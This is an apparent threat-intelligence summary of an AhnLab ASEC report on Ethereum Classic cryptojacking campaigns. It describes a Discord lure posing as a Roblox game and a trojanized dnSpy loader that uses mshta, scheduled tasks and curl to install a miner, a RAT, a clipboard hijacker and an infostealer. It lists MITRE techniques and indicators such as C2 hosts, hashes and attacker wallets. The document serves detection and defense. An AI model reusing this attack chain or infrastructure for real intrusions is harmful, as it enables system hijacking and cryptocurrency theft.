The ASEC analysis tracks CoinMiners targeting Korean and overseas users, detailing cases of Ethereum Classic mining and related tooling. It covers distribution methods (Discord, dnSpy disguises), involved malware families, wallet addresses, and the broader trend of miners for ETC persisting alongside Monero-focused campaigns. #CoinMiner #EthereumClassic #dnSpy #QuasarRAT #Vidar #ClipBanker
Keypoints
- CoinMiners are deployed covertly to repurpose system resources, with Monero (XMRig) being dominant, but Ethereum/Ethereum Classic mining tools remain in use.
- Ethereum Classic mining continues to appear in campaigns even after Ethereum’s move to Proof of Stake; ETC mining tools include lolMiner, Gminer, NbMiner, Trex, and PhoenixMiner.
- One attack used Discord to distribute a miner disguised as a Roblox game to Korean users, installing lolMiner on victims’ systems.
- A dnSpy-based distribution kerneled a multi-malware loader that installs Defender Control, Quasar RAT, ClipBanker, and an Ethereum miner via a VBS/mshta workflow and scheduled tasks.
- In ETC-focused campaigns, the loader uses Curl to download components, sets up scheduled tasks, and drops miners (lolMiner or PhoenixMiner) and other tools with actor wallet addresses.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The malware downloads payloads using curl during installation. Quote: “curl is used for malware installation.”
- [T1053.005] Scheduled Task – Attackers register commands in the Windows Task Scheduler to run periodically. Quote: “registers a variety of commands on the task scheduler to have them run periodically.”
- [T1059.005] Command and Scripting Interpreter – VBScript used for download/run flow; the text notes “VBS commands are registered to the task scheduler and run with mshta.”
- [T1218.005] Mshta – Use of mshta to execute the downloaded components. Quote: “run with mshta.”
- [T1562.001] Impair Defenses – Defender Control is used to disable Windows Defender. Quote: “Defender Control (a Windows Defender deactivation tool).”
- [T1115] Clipboard Data – Clipboard hijacking via ClipBanker to replace wallet addresses. Quote: “ClipBanker is a malware that checks data in the clipboard and changes it to the threat actor’s wallet address…”
- [T1219] Remote Access Tools – Quasar RAT used as a backdoor/c2 capability. Quote: “Quasar RAT with the name (tag), “OldBot” in their attacks.”
- [T1555.003] Credentials in Web Browsers – Vidar Information Stealer extracts credentials and browser data (cookies, histories, wallet addresses). Quote: “Vidar is an Infostealer that not only steals account credentials but also various other user information including web histories, cookies, and cryptocurrency wallet addresses.”
- [T1071.001] Web Protocols – C2/command-and-control uses web-based endpoints and URLs. (C2 addresses and web URLs listed in the article.)
Indicators of Compromise
- [IP] C2 addresses – 149.102.129.194:22, 95.217.29.31/1758, 95.217.31.129/1758, and 3 more IPs
- [Domain/URL] C2 and download domains – priv8note.net/r/ipcontent, mas.to/@ofadex, mas.to/@jogifoy492, steamcommunity.com/profiles/76561199436777531
- [MD5] File hashes – 5503eec7cb0ca25f1ecb0702acd14fba, 436efede151a6b24171e4f7e7deb07bc, aa2294040015cedbf94a56845f80e144
- [MD5] Additional hashes (examples) – 51ff42d909a879d42eb5f0e643aab806, 1b2878db748ddb13a90444ab36bae825
- [Wallet Address] Cryptocurrency wallets – 0x66B43Cc9B4f86E2B057a733816297a24BFa547D6, 0x4dd10a91e43bc7761e56da692471cd38c4aaa426
- [File] Dropped/related executables – m.jpg, dnscache.exe, obs.exe
- [C2] Command/Control URLs – hxxps://priv8note.net/r/ipcontent, hxxps://mas.to/@ofadex, hxxps://mas.to/@jogifoy492
- [Other] Vidar C2 indicators – steamcommunity.com/profiles/76561199436777531 and various IPs/URLs listed in the article
Read more: https://asec.ahnlab.com/en/46774/